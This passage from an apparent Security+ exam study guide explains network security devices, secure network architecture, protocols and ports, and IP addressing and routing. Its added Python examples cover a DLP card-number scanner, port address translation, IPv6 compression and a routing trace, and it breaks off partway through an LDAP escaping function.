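    """Luhn mod-10 check that every genuine card number satisfies."""
    total = 0
    for position, ch in enumerate(reversed(digits)):
        d = int(ch)
        if position % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(digits):
    """Keep the first and last four digits for the alert, hide the rest."""
    return digits[:4] + "*" * (len(digits) - 8) + digits[-4:]


def find_cards(text):
    """Return (brand, masked number) for every card number found in text."""
    hits = []
    for match in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", match.group())
        for brand, pattern in BRANDS.items():
            if pattern.fullmatch(digits) and luhn_ok(digits):
                hits.append((brand, mask(digits)))
                break
    return hits


def outbound_policy(text):
    """Decision the mail gateway applies: block and report if any card number
    is present, otherwise let the message go."""
    hits = find_cards(text)
    return ("block", hits) if hits else ("allow", [])


# Constructed e-mail. The first three numbers are the well-known test numbers
# for each brand; the fourth fails the Luhn check; the rest are not cards.
SAMPLE_EMAIL = """Hi Dave,
Please charge 4111 1111 1111 1111 for order 201903120001.
Backup cards: 378282246310005 (Amex) and 5555-5555-5555-4444.
The number 4111111111111112 is a typo, ignore it. Call me on 0131 555 0100.
"""

if __name__ == "__main__":
    print(outbound_policy(SAMPLE_EMAIL))
```

The alert reports only masked numbers, so the DLP log does not itself become a store of card data. As the text notes, this scan only works on content the gateway can read: a card number inside an encrypted attachment passes straight through.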

Exam tip:
DLP prevents PII and sensitive data from being inserted into an email or copied onto a USB flash drive.

Security information and event management

A security information and event-management (SIEM) system automates the collection of log files from multiple hosts, servers, and network devices, such as firewalls, in real time to identify potential risks to the network. The types of functionality from a SIEM system are:

Mail gateway

A Mail Gateway is a device that sits in a DMZ to scan incoming and outgoing email for viruses. It can also act as a spam filter, preventing spam emails from reaching the internal mail server.

Cloud-based email

Due to email being a critical function for businesses, more and more companies are moving away from in-house, server-based solutions, and are using Microsoft Office 365 or Google G Suite. The benefits of cloud-based email are that the cloud provider is responsible for scanning the incoming email as well as providing the hardware to run the mail servers.

Media gateway

A Media Gateway is a translation device or service that converts media streams between disparate telecommunications technologies. An example of this is Karaka, which is an XMPP Gateway that allows communication between Jabber and Skype.

Hardware security module

A Hardware Security Module (HSM) is a tamper-resistant physical device that generates and stores cryptographic keys, above all the private keys behind the X.509 certificates used on a network, so that the keys never leave the module. These modules traditionally come in the form of a plug-in card or an external device that attaches directly to a computer or network server.

Software-defined network

Traditional networks route packets via hardware routers, each of which makes its own forwarding decisions from its own configuration, so control is decentralized; however, in today's networks more and more people are using virtualization, including cloud providers. In a software-defined network (SDN), the control plane is separated from the data plane: a central controller decides how packets should be forwarded and pushes those rules down to the switches and routers, rather than each device being configured individually. This makes the network programmable and easier to manage, automate and scale.

Secure network architecture concepts

Securing networks and protecting them is vital to protect a company's assets. We use different zones and topologies, network separation and segmentation, and install firewalls to prevent unauthorized access to the network. First of all, let's look at different zones and topologies. There are three main zones—LAN, WAN and DMZ:

Example:

An upscale store sells designer sneakers at $230; however, the shop's owner purchases them from the manufacturer by placing orders on the extranet server. Access to the extranet web server is via a unique username and password, and the price the shop purchases the sneakers at is $125, allowing for a profit of $105. On the intranet web server is the manufacturing price of the sneakers, which are made in China for a mere $5 a pair:


Figure 15: Zones

From this information, you should ask yourself three simple questions:

You can see why data in a LAN needs to be secure and not freely available to the general public.

Network address translation

Network Address Translation is where a request from a private internal IP address is translated to an external public IP address, hiding the internal network from external attack. See Figure 16:


Figure 16: NAT

NAT could be set up to hide an R&D network where new products are designed. Remember, a competitor may try to steal your new ideas and get them to market before you. NAT could be set up on a firewall or a NAT server.

Port address translation

Port address translation (PAT) is where multiple internal requests are translated to an external IP address, see Figure 17:


Figure 17: PAT

A proxy server could be used for PAT as it gets many internal requests that are translated to one external IP address.
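The translation table a PAT device keeps, as an added example that is not from the book or any vendor's firmware. The `PatTable` class, the public address 203.0.113.10 and the inside hosts are constructed; it shows both directions of the translation, and why an unsolicited packet from the internet has nowhere to go.

```python
"""Port address translation table: many inside hosts share one public address.
Added example, not from the book. Addresses and flows are constructed."""
from itertools import count


class PatTable:
    def __init__(self, public_ip, first_port=1024):
        self.public_ip = public_ip
        self._next_port = count(first_port)
        self.outbound = {}   # (inside_ip, inside_port, dst_ip, dst_port) -> public port
        self.inbound = {}    # public port -> (inside_ip, inside_port)

    def translate_out(self, inside_ip, inside_port, dst_ip, dst_port):
        """Rewrite the source of an outgoing packet. A new flow gets a fresh
        public port; an existing flow keeps the port it was given."""
        flow = (inside_ip, inside_port, dst_ip, dst_port)
        if flow not in self.outbound:
            port = next(self._next_port)
            self.outbound[flow] = port
            self.inbound[port] = (inside_ip, inside_port)
        return self.public_ip, self.outbound[flow]

    def translate_in(self, public_port):
        """Rewrite the destination of a reply. A packet for a port with no
        mapping is unsolicited and is dropped: this is what hides the inside
        network from outside attack."""
        return self.inbound.get(public_port)


def scenario():
    """Two inside hosts using the same source port towards the same server."""
    pat = PatTable("203.0.113.10")
    first = pat.translate_out("192.168.1.20", 51000, "198.51.100.5", 443)
    second = pat.translate_out("192.168.1.21", 51000, "198.51.100.5", 443)
    again = pat.translate_out("192.168.1.20", 51000, "198.51.100.5", 443)
    return first, second, again, pat.translate_in(1025), pat.translate_in(9999)


if __name__ == "__main__":
    for step in scenario():
        print(step)
```

Both inside hosts chose source port 51000, so the public port, not the address, is what tells the two flows apart on the way back; the outside server only ever sees 203.0.113.10. A real implementation also ages out idle mappings so the port pool is not exhausted.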

Network access control (NAC)

If you have a Windows desktop or laptop and you go away on holiday for 2-3 weeks, when you come back your device may need multiple updates. Network Access Control (NAC) deals with this: after a remote client has authenticated, NAC checks that the device being used is fully patched before it is allowed onto the LAN. See Figure 18:


Figure 18: NAC

When the user is authenticated, the health authority (HAuth) checks against the registry of the client device to ensure that it is fully patched. A fully patched machine is deemed compliant and allowed access to the LAN. In the preceding diagram, Laptop 2 is compliant. If the device is not fully patched, it is deemed noncompliant and is redirected to a boundary network, which could also be known as a quarantine network. The components of NAC are:

Honeypot

When security teams are trying to find out the attack methods that hackers are using, they set up a website similar to the legitimate website with lower security, known as a honeypot. When the attack commences, the security team monitors the attack methods so that they can prevent future attacks. Another reason a honeypot is set up is as a decoy so that the real web server is not attacked. A group of honeypots is called a honeynet.

Exam tip:
A honeypot can be used to examine the attack method that hackers use.

Secure Socket Layer accelerators

Secure Sockets Layer (SSL), and its successor TLS, encrypt data so that when it is in transit it cannot be read or altered. The encryption is a processor-intensive operation, and most servers, such as database servers, are working very hard as it is. SSL acceleration refers to offloading the processor-intensive SSL/TLS encryption and decryption from a server to a dedicated device, such as a reverse proxy or a card with cryptographic hardware, to relieve the pressure on the server.

SSL/TLS decryptor

When traffic comes into your network from the internet and it is encrypted, the firewall, NIPS, NIDS, DLP, or any network device cannot examine the data. Therefore, after the traffic has passed through the external firewall, the SSL/TLS decryptor will decrypt the data before it passes through an inline NIPS. This then means that the NIPS can examine and prevent malicious traffic accessing the local area network.

Sensor/collector

A sensor/collector can be a device, tap, or firewall log whose purpose is to alert the NIDS of any changes in traffic patterns within the network. If you place your first sensor on the internet side of your network, it will scan all of the traffic from the internet.

Tap/port mirror

A tap or a port mirror is set up on a port of a switch so that a copy of the traffic arriving at that port is sent to another device, where it is either stored for later investigation or passed to a sensor, which analyzes the traffic and, if need be, informs the NIDS of changes in traffic patterns.

DDoS mitigator

A Distributed Denial of Service (DDoS) attack is where a very large amount of traffic is sent to a switch or a server so that it is overwhelmed and cannot function. A DDoS mitigator is a device, such as a stateful firewall on the external interface of your DMZ or a flood guard on an internal switch, that can identify the DDoS attack at an early stage and prevent it from being successful.

Exam tip:
Capturing the data flowing through a port on a switch can be done by port mirroring (a SPAN port on Cisco switches), also referred to as a tap. Strictly, a port mirror is configured in the switch software and can drop copies when the switch is busy, whereas a tap is a passive hardware device inserted into the link that copies every bit; the exam treats the two together.

Segregation/segmentation/isolation

Cyber crime is rife and is the fastest-growing criminal industry. In today's world, most businesses are interconnected and use the internet. Maintaining the security and integrity of data, including research and development, is paramount. We need to be able to isolate, segment, and segregate our network, both physically and virtually. Let's look at the options we may have:


Figure 19: Two VLANS in a switch

A VLAN is created by using the software on the switch where you can bond a number of ports to work together as a separate logical network. If you look at Figure 19, you can see that port numbers 1-4 have been used to create a VLAN for the IT department, and then ports 20-24 have been used to create another VLAN for the finance department. Although both of these departments are on an internal device, creating the VLANs isolates them from other VLANs and the company's network. An important factor is that a VLAN tag is set up so that when traffic arrives at the switch, it knows where to send it.

Security device/technology placement

It is important for a security or network administrator to understand the functionality that each device provides and where best to place them to ensure that your network is safe. Figure 20 shows the placement of each device:


Figure 20: Security device placement

If we look at Figure 20, the first thing you will notice is that the three network zones that have been established are the LAN, DMZ, and WAN. These networks are divided by two firewalls that are in a back-to-back configuration so that if traffic manages to get through the first firewall, we hope that the next firewall stops it. As resources, such as our website, are in the DMZ, the external firewall may have one or two ports open that the internal firewall between the DMZ and LAN does not.

DMZ device placement

Between the WAN and DMZ there is a network firewall. The purpose of this firewall is to prevent unauthorized access to the network. Directly behind the external firewall is an SSL/TLS decryptor that decrypts the traffic coming in so that other security devices can examine it.

The next stage is that the decrypted traffic is placed through an inline NIPS. As it is inline, all traffic must pass through it. The purpose of the NIPS is as an additional layer of security and should be placed close to the external firewall.

Behind the NIPS is the NIDS in passive mode: traffic does not travel through it, but it scans the network for changes in traffic patterns. The NIDS in the DMZ also has sensors/collectors placed in the DMZ to alert it to changes in traffic patterns.

LAN device placement

The firewall dividing the DMZ and the LAN will be a stateful firewall, which tracks the state of each connection (so it can drop SYN floods and other packets that belong to no established session) and knows the acceptable commands used by each application. Directly behind the firewall will be another inline NIPS examining the traffic as it comes into the LAN. Another NIDS and a set of sensors/collectors are placed in the LAN.

The internal switch connects all of the internal devices, and it will be a managed switch using 802.1x so that it authenticates all devices connecting to the network and stops unauthorized devices and rogue WAPs from connecting. The switch will have a flood guard configured to prevent DDoS and MAC flooding attacks. The switch may have a port mirror configured on one of the ports so that a copy of the traffic is sent to a sensor, or stored on a capture device for later investigation. Should the sensor identify anything abnormal, it will notify the NIDS in the LAN. A port mirror is also known as a tap.

Aggregation switches

Depending on the number of users that reside in your LAN, you may need several switches to be operating, and these switches need to move traffic between each other. Therefore, rather than having a daisy chain, which would take more time to move the traffic around, we install an aggregation switch. The aggregation switch connects multiple switches in a mode called link aggregation:


Figure 21: Aggregation switch

Link aggregation is a way of joining Ethernet links together so they act like a single, logical link. If you connect all of the switches together, you can balance the traffic among these links to improve performance. An important reason for using link aggregation is to provide fast and transparent recovery in case one of the individual links fails.

Implementing secure protocols

A protocol is the rules required by different applications for the exchange of data where the application can perform actions such as running commands on remote systems, sending and receiving email, or maybe downloading files from the internet. Each application has a special port number it uses for communication. If you think of ports as being TV channels, if we want to watch sport we go to the sports channels, if we want to watch news we go to the news channel. Applications are the same; if we want to send an email, we use a mail application, and they all have a distinct port number for communication.

There are two transport protocols that use ports: Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). The main difference between the two is that TCP is connection-oriented, as it uses a three-way handshake, while UDP is faster but less reliable as it is connectionless. See Figure 22 for the three-way handshake:


Figure 22: Three-way handshake

In a three-way handshake, the first packet sent is a SYN packet, in which the sending host tells the receiving host its initial sequence number (the number of its next packet). The receiving host replies with a SYN-ACK packet that acknowledges that number and states its own sequence number. The final ACK packet acknowledges both, and then the data is sent. The data is sent in segments, and as each is received an acknowledgement is sent that tells the sending host to send more. Once all of the data is sent, the two hosts exchange FIN and ACK packets to confirm that everything has been received, and the session closes.

In a UDP session, the application is responsible for ensuring that everything is received, and because a three-way handshake is not used, the connection is faster but less reliable. You would use UDP for streaming video, where speed is paramount.

For the purpose of the Security+ examination, you will need to know when to choose the correct protocol and which port it uses. A list of common protocols is listed here with their uses afterwards.

As most protocols use TCP ports, I will only mention the UDP ports and therefore you can assume if it is not labelled UDP, it is TCP.

Exam tip: Knowing why we use each protocol is more important than knowing the port numbers. There will be a review at the end of the book testing port numbers.

Protocol                                          UDP   Port        Use
File Transfer Protocol (FTP)                            21          File transfer: control channel (active-mode data uses TCP 20)
Secure Shell (SSH)                                      22          Run remote commands securely
Secure Copy Protocol (SCP)                              22          Secure copy to UNIX/Linux hosts, carried over SSH
Secure FTP (SFTP)                                       22          Secure file transfer, carried over SSH
Telnet                                                  23          Run remote commands in cleartext (unsecure)
Simple Mail Transfer Protocol (SMTP)                    25          Transport mail between mail servers
Domain Name System (DNS)                          UDP   53          Host name resolution (name queries)
Domain Name System (DNS)                                53          Zone transfers and replies too large for UDP (TCP)
Dynamic Host Configuration Protocol (DHCP)        UDP   67/68       Automatic IP address allocation (67 server, 68 client)
Trivial File Transfer Protocol (TFTP)             UDP   69          File transfer using UDP, no authentication
Hypertext Transfer Protocol (HTTP)                      80          Web browser, unencrypted
Kerberos                                                88          Ticket-based authentication, used by Active Directory (TCP and UDP)
Post Office Protocol 3 (POP3)                           110         Pull mail from the mail server, no copy left on the server
NetBIOS                                           UDP   137-139     NetBIOS name service (137), datagram service (138) and session service (139, TCP)
Internet Message Access Protocol (IMAP4)                143         Pull mail from the mail server, copy stays on the server
Simple Network Management Protocol (SNMP)         UDP   161/162     Manager queries device status on 161; devices send traps to 162
SNMP version 3 (SNMPv3)                           UDP   161/162     Secure version of SNMP (authentication and encryption), same ports
Lightweight Directory Access Protocol (LDAP)            389         Queries X.500-style directory objects, for example Active Directory
LDAP Secure (LDAPS)                                     636         LDAP with the session encrypted by SSL/TLS
IMAP4 Secure (IMAPS)                                    993         Secure IMAP4 over SSL/TLS
POP3 Secure (POP3S)                                     995         Secure POP3 over SSL/TLS
File Transfer Protocol Secure (FTPS)                    989/990     FTP over SSL/TLS; secure download of large files
Remote Desktop Protocol (RDP)                           3389        Microsoft remote access
Session Initiation Protocol (SIP)                       5060/5061   Sets up internet-based calls (5060 cleartext, 5061 over TLS)
Secure Real-time Transport Protocol (SRTP)        UDP   dynamic     Encrypted voice and video media; the RTP/SRTP ports are negotiated by SIP

Use case

A use case describes how something is used to achieve a goal, usually by several people or components working together. An example would be if you called a company: their customer services take your order, their finance department processes the payment, production makes the product, and dispatch mails it to you. In the following examples, we will see use cases for different protocols.

File transfer – use case

Transferring files is a common function. When we purchase an e-book, it is immediately available to download onto our Kindle. There are four different protocols that we can use for file transfers:

Exam Tip:
SSH is a secure method of running a command on a router.

Remote access – use case

There are various ways of obtaining remote access, we are going to look at each in turn, and decide when we would choose to use them:

Email – use case

There are different types of email: some are web-based and some use the MAPI client on the desktop. Let's look at each of them and understand when we would use them:

An easy way to remember the port number for IMAP4 is to pretend the first letter of IMAP is the number 1. Then take the last figure, which is 4, for the second digit, and then take 1 from 4 to get 3 for your third digit, giving you 143, the actual port number.

Name resolution – use case

There are two types of name resolution: hostname resolution, which is the most common, and NETBIOS, which is a legacy name resolution that is very rarely used.

Hostname

The most common form of name resolution is hostname resolution. It has two sources: a distributed database of hostnames to IP addresses called the Domain Name System (DNS), and a local flat file on each computer called the hosts file:

Example: A user would like to visit the website of http://ianneil501.com; to get there, they would enter www.ianneil501.com in their web browser as per Figure 23. The hostname resolution follows a strict process:


Figure 23: Hostname resolution

In Figure 23, the hostname resolution adopts a strict order of sources and takes the first entry it finds for that hostname, whether it is right or wrong; this is a pitfall of the process, because a poisoned cache entry or a tampered hosts file entry is used instead of the correct answer. Let's look at this process starting with the DNS Cache:

DNSSEC

To prevent someone poisoning DNS records, DNSSEC was introduced to protect DNS traffic. Each set of DNS records is digitally signed with the zone's private key, producing an RRSIG record; a resolver that validates the signature can be sure the records are genuine and their integrity has been maintained. DNSSEC provides integrity and authenticity only; it does not encrypt DNS queries.

Exam tip:
DNSSEC produces a RRSIG record for each host.

NETBIOS

NETBIOS is a Microsoft legacy naming convention with a flat namespace: a name is a maximum of 15 characters, followed by a sixteenth byte that identifies the service. Each computer therefore has several separate entries in the NetBIOS name database, which is called WINS when it is held on a server and is otherwise a flat file called the LMHosts file.

The entry for PC1 as a WINS database would be:

Web – use case

The majority of people use the internet to make purchases and research information, so it is important that we know what the protocols used when accessing websites are:

Voice and video – use case

In the past, when companies wanted meetings, such as a sales meeting, a date was set and the salespeople kept their schedule open, travelling to the location of the meeting the night before and booked themselves into a hotel. This was very costly and time-consuming; nowadays we use videoconferencing where everyone connects to the meeting, does not have to travel, and can free their schedule, making them more productive. In the Security+ exam, we need to be able to understand which protocols are used. There are three main protocols and these are:

Exam tip:
Voice traffic should be placed in its own VLAN to ensure reliability.

Network address allocation – use case

If you have a network with 10,000 computers and every morning you needed to manually insert an IP address into the machine, it would be very time-consuming and there would be a very high chance that you would insert a typo and the IP address would be incorrect. There are two different IP addressing schemes: IP Version 4 and IP Version 6. Let's look at each of these in turn.

IP version 4

The format of an IP Version 4 address is dotted decimal notation, composed of four octets, making it 32-bit addressing, for example 131.107.2.1. The class of the address is determined by the first octet on the left-hand side. Within a subnet, the address whose host portion is all zeros is the network ID and the address whose host portion is all ones is the broadcast address; in a /24 subnet these are the addresses ending in 0 and 255, so neither can be assigned to a host.

The network ID is like a zip code: it identifies the whole area rather than one person in it. The broadcast address is used to send traffic to every host on the subnet. Therefore, in a /24 network, we cannot give a host an IP address that ends in a zero or 255.

There are public addresses that you lease and private addresses that are free but can only be used internally. If you have a banger of a car, you can drive it around private land all day long, but as soon as you put it on a public road without any insurance, the police will impound it if they catch you. Private IP addresses can operate internally, but routers on the internet will drop any packet with a private source or destination address. There are three private IP address ranges, defined in RFC 1918:

Each IP Version 4 client needs an IP address and a subnet mask whose job is to determine whether the packet delivery is local or remote. If the packet is for a remote address, then the client needs to be configured with a default gateway; the router interface on the LAN. If the client does not have a default gateway, then it is restricted to communicating on the local network. There are two appendices at the back of this book on subnetting and CIDR notation.

IP Version 4 addresses are allocated on a regional basis throughout the world by the five Regional Internet Registries:

Registry    Area covered
AFRINIC     Africa
APNIC       Asia/Pacific region
ARIN        Canada, USA, and some Caribbean islands
LACNIC      Latin America and some Caribbean islands
RIPE NCC    Europe, the Middle East, and Central Asia

The automatic way of allocating IP addresses is to use a Dynamic Host Configuration Protocol (DHCP) server. This is a server with a pool of IP addresses that it can lease to requesting hosts; the four-stage lease process is known as D-O-R-A (Discover, Offer, Request, Acknowledge).

IP version 4 – lease process

IP version 4 lease process – troubleshooting

A DHCP client will not always obtain an IP address, usually because it cannot reach a DHCP server; less often, the address pool is exhausted (which is exactly what a DHCP starvation attack sets out to cause). In either case, the client falls back to Automatic Private IP Addressing (APIPA) and assigns itself an address starting 169.254.x.x. This is an excellent aid to troubleshooting, as it tells the network engineer immediately that the client did not get a lease from the DHCP server. There are many reasons that this happens, so let's look at the DHCP process:
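The checks in the IP Version 4 section above (address class, private versus public, network and broadcast addresses, and whether the subnet mask makes a destination local or remote) and the APIPA symptom just described can all be done mechanically. The following Python example is added here and is not from the book; it uses the standard library's ipaddress module, the RFC 1918 private ranges and the 169.254.0.0/16 link-local range. The classful lookup is included only because the exam asks for it; real networks are classless, which is why the network and broadcast addresses are computed from the mask rather than from the last octet.

```python
import ipaddress
from typing import Dict, Optional

# RFC 1918 private ranges and the APIPA / link-local range (RFC 3927).
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
APIPA_NET = ipaddress.ip_network("169.254.0.0/16")


def classful_class(ip: str) -> str:
    """Historic class, read from the first octet (exam knowledge only)."""
    first = int(ip.split(".")[0])
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D (multicast)"
    return "E (reserved)"


def describe(ip: str, mask: str) -> Dict[str, str]:
    """Classify an address/mask pair the way a troubleshooter would."""
    iface = ipaddress.ip_interface(f"{ip}/{mask}")   # mask may be dotted or /n
    addr, net = iface.ip, iface.network
    if addr in APIPA_NET:
        scope = "APIPA: no DHCP lease obtained, check connectivity to the DHCP server"
    elif any(addr in p for p in PRIVATE_NETS):
        scope = "private (RFC 1918), dropped by internet routers"
    else:
        scope = "public"
    if addr == net.network_address:
        role = "network ID (unusable for a host)"
    elif addr == net.broadcast_address:
        role = "broadcast (unusable for a host)"
    else:
        role = "host"
    return {"class": classful_class(ip), "scope": scope,
            "role": role, "network": str(net)}


def delivery(src_ip: str, mask: str, dst_ip: str,
             gateway: Optional[str] = None) -> str:
    """Apply the subnet mask: same subnet means deliver directly,
    otherwise hand the packet to the default gateway (if one is configured)."""
    net = ipaddress.ip_interface(f"{src_ip}/{mask}").network
    if ipaddress.ip_address(dst_ip) in net:
        return "local"
    if gateway is None:
        return "unreachable: remote destination but no default gateway"
    return f"remote via {gateway}"


if __name__ == "__main__":
    print(describe("131.107.2.1", "255.255.255.0"))
    print(describe("169.254.10.20", "255.255.0.0"))
    print(delivery("10.1.1.5", "255.255.255.0", "10.1.2.9", "10.1.1.1"))
```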


Figure 24: DHCP process across subnets

If the DHCP client is on another subnet, it can cause some problems:

IP version 6 addressing

IP Version 6 addresses are written in colon-hexadecimal format and comprise 8 blocks of 4 hexadecimal digits (16 bits each), making a 128-bit address. In the usual /64 allocation, the first 64 bits from the left-hand side are the routing or network prefix, and the last 64 bits identify the host interface. There are different address ranges and the main three are:

Example 1: We have an IP Version 6 address of 2001:ABCD:0000:0000:0000:0000:1230:0ABC that we want to simplify. First we remove the leading zeros from every block, then we replace the run of all-zero blocks with a double colon:

You will notice that we have replaced four consecutive blocks of zeros with the double colon. To expand the address again, we count the remaining blocks; since there are four, we know that four blocks are missing. The double colon may appear only once in an address, otherwise there would be no way to tell how many blocks each one stands for.

Example 2: We have an IP Version 6 address of 2001:ABCD:0000:0000:ABCD:0000:1230:0ABC that we want to simplify. Again, we first remove the leading zeros from every block:

You will notice that this is trickier, as there are blocks of zeros in two places. The double colon replaces the longest run of zero blocks (the first run if two are the same length), and any remaining zero block is simply written as 0. In the example, we count only six blocks, so we know that two blocks are missing.
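The two examples above follow the rules in RFC 5952, which also says that a lone zero block is never replaced by the double colon. The following Python example is added here and is not from the book; it implements the compression and expansion by hand, in the book's uppercase style (the RFC itself prefers lowercase), and cross-checks every result against the standard library's ipaddress module so a reader can test any address of their own.

```python
import ipaddress
from typing import List


def compress_ipv6(addr: str) -> str:
    """Compress a full 8-block IPv6 address following RFC 5952:
    drop leading zeros in each block, then replace the longest run of two or
    more all-zero blocks (the first run on a tie) with '::'."""
    blocks = addr.strip().split(":")
    if len(blocks) != 8:
        raise ValueError("expected 8 colon-separated blocks")
    values = [int(b, 16) for b in blocks]        # rejects non-hex garbage

    best_start, best_len = -1, 0
    i = 0
    while i < 8:                                  # scan for runs of zero blocks
        if values[i] == 0:
            j = i
            while j < 8 and values[j] == 0:
                j += 1
            if j - i > best_len:                  # strictly greater keeps first on tie
                best_start, best_len = i, j - i
            i = j
        else:
            i += 1

    hexblocks = [format(v, "X") for v in values]  # formatting strips leading zeros
    if best_len < 2:                              # a single zero block stays as '0'
        return ":".join(hexblocks)
    left = ":".join(hexblocks[:best_start])
    right = ":".join(hexblocks[best_start + best_len:])
    return f"{left}::{right}"


def expand_ipv6(addr: str) -> str:
    """Inverse: count the blocks either side of '::' to see how many are missing."""
    if addr.count("::") > 1:
        raise ValueError("'::' may appear only once")
    if "::" in addr:
        left, right = addr.split("::", 1)
        l: List[str] = left.split(":") if left else []
        r: List[str] = right.split(":") if right else []
        blocks = l + ["0"] * (8 - len(l) - len(r)) + r
    else:
        blocks = addr.split(":")
    if len(blocks) != 8:
        raise ValueError("address does not expand to 8 blocks")
    return ":".join(format(int(b, 16), "04X") for b in blocks)


def agrees_with_stdlib(addr: str) -> bool:
    """Sanity check: our compression must match ipaddress (compared lowercase)."""
    return compress_ipv6(addr).lower() == ipaddress.IPv6Address(addr).compressed


if __name__ == "__main__":
    for a in ("2001:ABCD:0000:0000:0000:0000:1230:0ABC",
              "2001:ABCD:0000:0000:ABCD:0000:1230:0ABC"):
        print(a, "->", compress_ipv6(a), "->", expand_ipv6(compress_ipv6(a)))
```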

Subscription services – use case

In the past, the traditional method for purchasing application software was to buy the application on a DVD from a local store, or wait 3-4 days for it to be delivered from Amazon, and pay $300 to $400 for it. With the evolution of the cloud, there is now a tendency to obtain applications through subscription services, where you pay a monthly fee and can download the application immediately. Two examples of this are:

Routing – use case

The purpose of a router is to connect networks together, whether it be internal subnets or external networks and route packets between them. A router sits at layer 3 of the OSI Reference Model, where the data packets are known as IP packets, as Layer 3 of the OSI deals with IP addressing and delivery.

If we look at Figure 25, we can see five different routers that connect networks between New York, Dublin, Paris, London, and Edinburgh:


Figure 25: Routing packets.

If we think of these routers as post offices delivering mail, it may make it easier to understand. If mail arrives at the Paris post office, the people working there have two sacks, one for Dublin and the other for London; they just need to know where to send the mail next. They cannot have sacks for every destination in the world, it is just not feasible.

Example: If mail arrives at the Paris post office and it is destined for Edinburgh, the post office staff know that they just need to put the mail in the London sack. Once the mail arrives in London, there will be two different sacks, one destined for Edinburgh and the other destined for Paris. The workers know to place the mail for Edinburgh in the Edinburgh sack. If they receive mail for New York, they know to place it in the Paris sack.

Routing packets is no more difficult than moving mail around the world; the router has many routes in a routing table and knows the next hop for packet delivery.
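The sack analogy maps directly onto a routing table: each entry is a destination prefix and a next hop, and when several entries match, the most specific (longest) prefix wins, with a default route of 0.0.0.0/0 catching everything else. The following Python example is added here and is not from the book; it builds the five routers of Figure 25 with assumed 10.x.0.0/16 prefixes for each city, looks up next hops by longest-prefix match, and traces a packet hop by hop. One deliberately misconfigured route on Paris shows why IP packets carry a TTL: a loop between two routers would otherwise forward the packet forever.

```python
import ipaddress
from typing import List, Optional, Tuple


class Router:
    """A routing table of (destination prefix, next hop) entries. Like the
    post office, the router knows only where to send the packet next."""

    def __init__(self, name: str, routes: List[Tuple[str, str]]):
        self.name = name
        self.routes = [(ipaddress.ip_network(p), nh) for p, nh in routes]

    def next_hop(self, dst: str) -> Optional[str]:
        addr = ipaddress.ip_address(dst)
        matches = [(net, nh) for net, nh in self.routes if addr in net]
        if not matches:
            return None                       # no route: packet is dropped
        net, nh = max(matches, key=lambda m: m[0].prefixlen)  # longest prefix wins
        return nh


# Constructed topology mirroring the book's five cities (prefixes are assumed):
# NewYork - Dublin - Paris - London - Edinburgh
ROUTERS = {
    "NewYork":   Router("NewYork",   [("10.1.0.0/16", "local"),
                                      ("0.0.0.0/0", "Dublin")]),
    "Dublin":    Router("Dublin",    [("10.2.0.0/16", "local"),
                                      ("10.1.0.0/16", "NewYork"),
                                      ("0.0.0.0/0", "Paris")]),
    "Paris":     Router("Paris",     [("10.3.0.0/16", "local"),
                                      ("10.1.0.0/16", "Dublin"),
                                      ("10.2.0.0/16", "Dublin"),
                                      ("10.2.200.0/24", "London"),   # deliberate mistake
                                      ("0.0.0.0/0", "London")]),
    "London":    Router("London",    [("10.4.0.0/16", "local"),
                                      ("10.5.0.0/16", "Edinburgh"),
                                      ("0.0.0.0/0", "Paris")]),
    "Edinburgh": Router("Edinburgh", [("10.5.0.0/16", "local"),
                                      ("0.0.0.0/0", "London")]),
}


def trace(start: str, dst: str, ttl: int = 16) -> List[str]:
    """Follow next hops from a starting router until the destination is local,
    there is no route, or the TTL runs out (which catches routing loops)."""
    path = [start]
    current = start
    for _ in range(ttl):
        nh = ROUTERS[current].next_hop(dst)
        if nh == "local":
            return path
        if nh is None:
            return path + ["no route"]
        path.append(nh)
        current = nh
    return path + ["TTL expired"]


if __name__ == "__main__":
    print(trace("Paris", "10.5.0.10"))        # Paris -> London -> Edinburgh
    print(trace("London", "10.1.0.5"))        # London -> Paris -> Dublin -> NewYork
    print(trace("Paris", "10.2.200.9", 6))    # the /24 on Paris creates a loop
```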

Several protocols are used in the management and control of IP packets going through the router:

Time synchronization – use case

Time is vital for SIEM systems, so that events from many devices can be placed in chronological order, and for Kerberos, which relies on timestamps to reject replayed authenticators. In a modern network, the domain controller is synchronized with a time server or an atomic clock, also known as a reference time source. NTP arranges time sources into levels called strata; the three main types of time server are:


Figure 26: Time synchronization.

From the diagram, you can see that Stratum 0 is the external reference clock itself (an atomic clock or GPS receiver) and the internal Stratum 1 time server synchronizes directly with it. A domain controller or SIEM server synchronizes its time with a Stratum 1 or Stratum 2 server.

Exam tip:
A Stratum 0 time server is the ultimate authority in a Stratum timeserver environment. It is the atomic clock that time should be synchronized with.

Directory services – use case

Directory services hold accounts for users, groups, and objects such as printers, and they store these objects in the International Telecommunication Union (ITU-T) X.500 format. There are only three main object types:

Example: If I have a user called Ian who works in the IT department within a domain called ianneil501.com, the distinguished name in X.500 format starts at the bottom of the tree (the user) and works up to the domain, reading from left to right:

cn=Ian, ou=IT, dc=ianneil501, dc=com

The user is a common name (cn), the IT department is an organizational unit (ou), and ianneil501.com is the domain, split into two domain components (dc).

Active Directory

Microsoft's Active Directory is a very common directory service and we are going to look at the components and protocols used:

Example: LDAP is the same as a shopkeeper who sells shoes. When a delivery arrives, the shoes are unloaded and stored at the back of the shop. When a customer arrives and cannot see the size they want, they ask the shopkeeper, who goes to the storeroom to find the shoes.

When a systems administrator opens up a wizard in Active Directory and creates a user account, LDAP creates and stores objects in an X500 format. If the administrator has 10,000 users and needs to find a user, they use the search facility and LDAP brings back the result of the search:
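Building the distinguished name above and searching the directory are both string operations, and the search is where security bugs creep in: an LDAP filter assembled from unescaped user input is an injection vulnerability, exactly like SQL injection. The following Python example is added here and is not from the book; it builds a DN from its components (escaping per RFC 4514), escapes filter values per RFC 4515, and shows a vulnerable filter next to its hardened form. The attribute names (sAMAccountName, objectClass) are the Active Directory ones; no directory is contacted, the functions only produce the strings that would be sent.

```python
from typing import List


def escape_dn_value(value: str) -> str:
    """RFC 4514 escaping for a single RDN value (the text after 'cn=')."""
    special = set(',+"\\<>;=')
    out = []
    last = len(value) - 1
    for i, ch in enumerate(value):
        if (ch in special
                or (ch == "#" and i == 0)
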